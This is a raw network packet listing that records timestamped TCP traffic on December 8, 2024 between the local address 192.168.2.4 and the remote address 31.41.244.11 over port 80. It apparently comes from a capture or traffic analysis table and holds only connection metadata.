                                                                                                                                          Dec 8, 2024 18:06:11.726933002 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.727756023 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.727801085 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.727925062 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.727958918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.728733063 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.728775024 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.728853941 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.728893995 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.730086088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.730127096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.730302095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.730344057 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.731120110 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.731173038 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.731182098 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.731220007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.731966019 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.732007980 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.732122898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.732162952 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.732819080 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.732860088 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.732929945 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.732969999 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.733877897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.733920097 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.733985901 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.734030008 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.734915018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.734957933 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.735019922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.735060930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.735968113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.736011028 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.736052036 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.736094952 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.736903906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.736947060 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.737032890 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.737075090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.737948895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.737992048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.738020897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.738059044 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.738960028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.739001989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.739090919 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.739132881 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.739990950 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.740031958 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.740303993 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.740345001 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.740989923 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.741031885 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.741103888 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.741143942 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.742036104 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.742077112 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.742165089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.742207050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.743443966 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.743486881 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.743521929 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.743562937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.744360924 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.744405031 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.744410992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.744453907 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.745105028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.745151043 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.745162010 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.745203972 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.746124983 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.746167898 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.746403933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.746443987 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.747150898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.747194052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.747325897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.747366905 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.748258114 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.748302937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.748400927 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.748445034 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.749177933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.749217033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.749334097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.749370098 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.750217915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.750262976 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.750339985 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.750384092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.751302958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.751342058 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.751398087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.751440048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.752305984 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.752330065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.752348900 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.752360106 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.753243923 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.753282070 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.891738892 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.891804934 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.891849041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.891897917 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.892260075 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.892302036 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.892383099 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.892424107 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.893249989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.893296957 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.893630981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.893673897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.893781900 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.893821001 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.894699097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.894742966 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.894743919 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.894783020 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.895813942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.895857096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.896025896 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.896064997 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.896811008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.896851063 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.896950960 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.896991014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.897746086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.897787094 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.897845030 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.897887945 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.898741961 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.898783922 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.898812056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.898852110 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.899749041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.899791002 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.899846077 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.899888992 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.900799036 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.900844097 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.900913000 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.900959015 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.901916981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.901963949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.902009010 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.902050018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.902817011 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.902857065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.902906895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.902946949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.903987885 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.904047012 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.904099941 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.904143095 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.904859066 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.904897928 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.904994965 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.905031919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.905878067 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.905916929 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.906104088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.906146049 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.906925917 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.906965971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.907000065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.907041073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.907913923 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.907954931 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.908003092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.908041000 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.908987999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.909033060 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.909161091 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.909207106 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.909965992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.910008907 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.910084963 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.910128117 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.910969973 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.911010981 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.911112070 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.911154985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.912038088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.912081003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.912147999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.912194967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.913064003 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.913109064 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.913135052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.913175106 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.914051056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.914109945 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.914252996 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.914299011 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.915067911 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.915111065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.915179014 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.915218115 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.916187048 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.916224957 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.916320086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.916358948 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.917398930 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.917438030 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.917543888 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.917587042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.918292046 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.918334007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.918430090 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.918473005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.919255972 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.919297934 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.919332027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.919378996 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.920206070 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.920244932 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.920337915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.920383930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.921210051 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.921253920 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.921257973 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.921295881 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.922224045 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.922266960 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.922357082 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.922398090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.923249006 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.923289061 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.923290968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.923332930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.924271107 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.924315929 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.924331903 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.924371004 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.925297022 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.925327063 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.925339937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.925365925 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.926317930 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.926359892 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.926439047 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.926481962 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.927357912 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.927392960 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.927500010 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.927544117 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.928352118 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.928394079 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.928457022 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.928499937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.929404974 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.929446936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.929722071 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.929769993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.930434942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.930476904 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.930500031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.930536985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.931391001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.931430101 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.931687117 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.931730032 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.932445049 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.932482958 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.932571888 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.932610989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.933478117 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.933518887 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.933597088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.933640003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.934555054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.934602976 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.934747934 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.934793949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.935516119 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.935553074 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.935648918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.935692072 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.936537981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.936579943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.936645031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.936686993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.937562943 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.937603951 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.937606096 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.937650919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.938582897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.938627005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.938683987 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.938724995 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.939599991 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.939644098 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.939703941 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.939744949 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.940608025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.940649986 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.940716028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.940759897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.941653967 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.941699028 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.941705942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.941746950 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.942672014 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.942715883 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.942765951 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.942806005 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.943691015 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:11.943733931 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:11.943804979 CET804976531.41.244.11192.168.2.4
